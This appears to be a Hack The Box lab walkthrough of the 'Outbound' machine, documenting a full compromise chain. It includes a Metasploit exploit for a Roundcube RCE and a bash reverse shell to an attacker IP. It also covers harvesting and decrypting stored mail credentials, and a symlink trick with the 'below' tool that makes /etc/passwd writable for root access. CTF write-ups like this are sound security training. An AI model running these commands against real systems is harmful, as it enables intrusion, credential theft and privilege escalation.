> m4rt@CTF_ARCHIVE:~$

// ATTACHMENTS

Hack The Box / LINUX / 2025-07-19

Hack The Box — Outbound (Linux)

Roundcube RCE (CVE-2025-49113) gives container access, decrypted IMAP credentials lead to SSH as jacob, and below log-file symlink abuse (CVE-2025-27591) enables root by modifying /etc/passwd.

Target

  • IP: 10.129.229.101

Machine information

As is common in real-life pentests, you start the Outbound box with credentials for the following account:

  • tyler / LhKL1o9Nm3X2

Port scan

sudo nmap -sC -sV 10.129.229.101 -p- -T5 -v

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add mail.outbound.htb and outbound.htb to /etc/hosts.

Go to http://mail.outbound.htb.

It is Roundcube.

Login with the provided tyler credentials.

Click the question mark icon.

We notice:

Roundcube Webmail 1.6.10

Note

You can also obtain the version without login:

curl http://mail.outbound.htb/roundcube/CHANGELOG.md | more

It confirms version 1.6.10.

There is a vulnerability: CVE-2025-49113.

The exploit is available in Metasploit.

msfconsole
use exploit/multi/http/roundcube_auth_rce_cve_2025_49113
set LHOST tun0
set RHOSTS mail.outbound.htb
set USERNAME tyler
set PASSWORD LhKL1o9Nm3X2
exploit

We obtain a meterpreter shell.

shell

This shell is not very convenient, so get another reverse shell.

Start a listener:

nc -vlnp 4444

On the target shell run:

bash -c 'bash -i >& /dev/tcp/10.10.15.37/4444 0>&1'

We obtain a reverse shell.

Upgrade shell:

script -qc /bin/bash /dev/null
# CTRL+z
stty raw -echo
fg

Check identity:

whoami

We are www-data.

We are inside a Docker container.

cd /var/www/html/roundcube
grep -nriE 'mysql' .

We notice:

./config/config.inc.php:28:$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';

Connect to MySQL:

mysql -u roundcube -h 127.0.0.1 -p

Use password:

RCDBPass2025

show databases;

+--------------------+
| Database           |
+--------------------+
| information_schema |
| roundcube          |
+--------------------+

use roundcube;
show tables;

+---------------------+
| Tables_in_roundcube |
+---------------------+
| cache               |
| cache_index         |
| cache_messages      |
| cache_shared        |
| cache_thread        |
| collected_addresses |
| contactgroupmembers |
| contactgroups       |
| contacts            |
| dictionary          |
| filestore           |
| identities          |
| responses           |
| searches            |
| session             |
| system              |
| users               |
+---------------------+

select * from users;

+---------+----------+-----------+---------------------+---------------------+---------------------+----------------------+----------+---------------------------------------------------+
| user_id | username | mail_host | created             | last_login          | failed_login        | failed_login_counter | language | preferences                                       |
+---------+----------+-----------+---------------------+---------------------+---------------------+----------------------+----------+---------------------------------------------------+
|       1 | jacob    | localhost | 2025-06-07 13:55:18 | 2025-06-11 07:52:49 | 2025-06-11 07:51:32 |                    1 | en_US    | a:1:{s:11:"client_hash";s:16:"hpLLqLwmqbyihpi7";} |
|       2 | mel      | localhost | 2025-06-08 12:04:51 | 2025-06-08 13:29:05 | NULL                |                 NULL | en_US    | a:1:{s:11:"client_hash";s:16:"GCrPGMkZvbsnc3xv";} |
|       3 | tyler    | localhost | 2025-06-08 13:28:55 | 2025-07-15 20:09:27 | 2025-07-15 20:09:02 |                    1 | en_US    | a:1:{s:11:"client_hash";s:16:"Y2Rz3HTwxwLJHevI";} |
+---------+----------+-----------+---------------------+---------------------+---------------------+----------------------+----------+---------------------------------------------------+

select * from identities;

+-------------+---------+---------------------+-----+----------+-------+--------------+-----------------+----------+-----+-----------+----------------+
| identity_id | user_id | changed             | del | standard | name  | organization | email           | reply-to | bcc | signature | html_signature |
+-------------+---------+---------------------+-----+----------+-------+--------------+-----------------+----------+-----+-----------+----------------+
|           1 |       1 | 2025-06-07 13:55:18 |   0 |        1 | jacob |              | jacob@localhost |          |     | NULL      |              0 |
|           2 |       2 | 2025-06-08 12:04:51 |   0 |        1 | mel   |              | mel@localhost   |          |     | NULL      |              0 |
|           3 |       3 | 2025-06-08 13:28:55 |   0 |        1 | tyler |              | tyler@localhost |          |     | NULL      |              0 |
+-------------+---------+---------------------+-----+----------+-------+--------------+-----------------+----------+-----+-----------+----------------+

Roundcube does not store passwords in the DB; it authenticates users through the IMAP server.

select * from session;

One session row contains serialized/base64 data, including:

username|s:5:"jacob";
...
password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/";

So we obtained credentials:

  • jacob : L7Rv00A8TuwJAr67kITxxcSgnIk25Am/

However, this password appears encrypted.

The decrypt function is here:

  • https://github.com/roundcube/roundcubemail/blob/8f7cc42fd65e0f92bda3c05b7419fe6081680b8b/program/lib/Roundcube/rcube.php#L943

In /var/www/html/roundcube/config/config.inc.php we find key:

$config['des_key'] = 'rcmail-!24ByteDESkey*Str';

From Roundcube source, the cipher is DES-EDE3-CBC.

See attached script: attachments/decrypt.php.

php decrypt.php

We obtain password:

595mO8DmwGeD

su jacob

Enter password and get a shell.

Login to Roundcube with jacob credentials.

There is this email from tyler:

Due to the recent change of policies your password has been changed.
Please use the following credentials to log into your account: gY4Wr3a1evp4
Remember to change your password when you next log into your account.
Thanks!
Tyler

ssh jacob@outbound.htb

Enter password gY4Wr3a1evp4.

We get a shell.

sudo -l

Matching Defaults entries for jacob on outbound:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin, use_pty

User jacob may run the following commands on outbound:
    (ALL : ALL) NOPASSWD: /usr/bin/below *, !/usr/bin/below --config*, !/usr/bin/below --debug*, !/usr/bin/below -d*

below is a Meta program:

  • https://github.com/facebookincubator/below
sudo below

We see version 0.8.0.

There is vulnerability CVE-2025-27591.

below creates world-readable/writable folder /var/log/below.

Inside it creates world-readable/writable file error_root.log.

Remove error_root.log:

rm error_root.log

Create symbolic link to /etc/passwd:

ln -s /etc/passwd error_root.log

Run below:

sudo below

Quit with q.

ls -la /etc/passwd

-rw-rw-rw- 1 root root 1840 Jul 15 23:48 /etc/passwd

Now we can add a root-equivalent user:

pw=$(openssl passwd Password123); echo "r00t:${pw}:0:0:root:/root:/bin/bash" >> /etc/passwd

su r00t

Enter password Password123.

We obtain a shell as root.